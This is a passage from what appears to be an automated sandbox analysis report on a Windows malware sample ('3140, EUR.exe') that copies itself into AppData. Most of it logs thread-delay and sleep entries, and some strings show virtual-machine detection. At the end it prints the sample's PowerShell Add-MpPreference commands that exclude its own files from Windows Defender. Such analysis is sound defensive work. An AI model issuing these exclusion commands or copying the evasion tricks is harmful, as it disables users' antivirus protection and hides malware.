                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594281
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594172
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594062
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7468Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6589Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeWindow / User API: threadDelayed 7175Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeWindow / User API: threadDelayed 2655Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeWindow / User API: threadDelayed 2161
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeWindow / User API: threadDelayed 7694
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 6912Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep count: 7468 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300Thread sleep count: 177 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep count: 32 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7448Thread sleep count: 7175 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7448Thread sleep count: 2655 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -599219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -598672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -598344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -598007s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -597786s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -597672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -597560s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -597334s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -597212s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -597045s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -596937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -596828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -596717s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -596609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -596500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -596391s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -596266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -596141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -595922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -595812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -595703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -595594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -595484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -595375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -595266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -595141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -595016s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -594865s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -594484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -594180s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -594061s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -593953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -593844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -593734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -593625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444Thread sleep time: -593502s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7316Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep count: 34 > 30
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -31359464925306218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7740Thread sleep count: 2161 > 30
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -599828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -599560s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7740Thread sleep count: 7694 > 30
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -599432s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -599174s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -599047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -598937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -598828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -598718s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -598609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -598500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -598387s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -598266s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -598156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -598047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -597937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -597828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -597719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -597594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -597484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -597375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -597265s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -597156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -597047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -596937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -596828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -596719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -596609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -596500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -596390s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -596281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -596172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -596062s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -595953s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -595844s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -595734s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -595625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -595515s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -595406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -595294s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -595174s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -595058s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -594937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -594828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -594719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -594609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -594500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -594391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -594281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -594172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736Thread sleep time: -594062s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598007Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597786Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597560Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597334Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597212Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597045Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596717Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596609Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596500Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596391Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596266Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595484Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595375Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595266Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595141Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595016Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 594865Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 594484Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 594180Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 594061Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593953Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593734Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593625Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593502Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599560
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599432
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599174
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599047
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598937
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598718
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598609
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598500
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598387
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598266
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598156
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598047
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597937
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597719
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597594
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597484
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597375
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597265
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597156
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597047
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596937
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596719
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596609
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596500
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596390
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596281
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596172
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596062
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595953
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595844
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595734
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595294
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595174
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595058
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594937
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594719
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594609
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594500
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594391
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594281
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594172
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594062
                    Source: lkuPOyvaWlIu.exe, 00000009.00000002.1801962892.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: 3140, EUR.exe, 00000008.00000002.4120490815.00000000013A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllubli
                    Source: lkuPOyvaWlIu.exe, 00000009.00000002.1801962892.0000000000D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
                    Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4120391587.0000000001496000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F29548 LdrInitializeThunk,15_2_06F29548
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"Jump to behavior
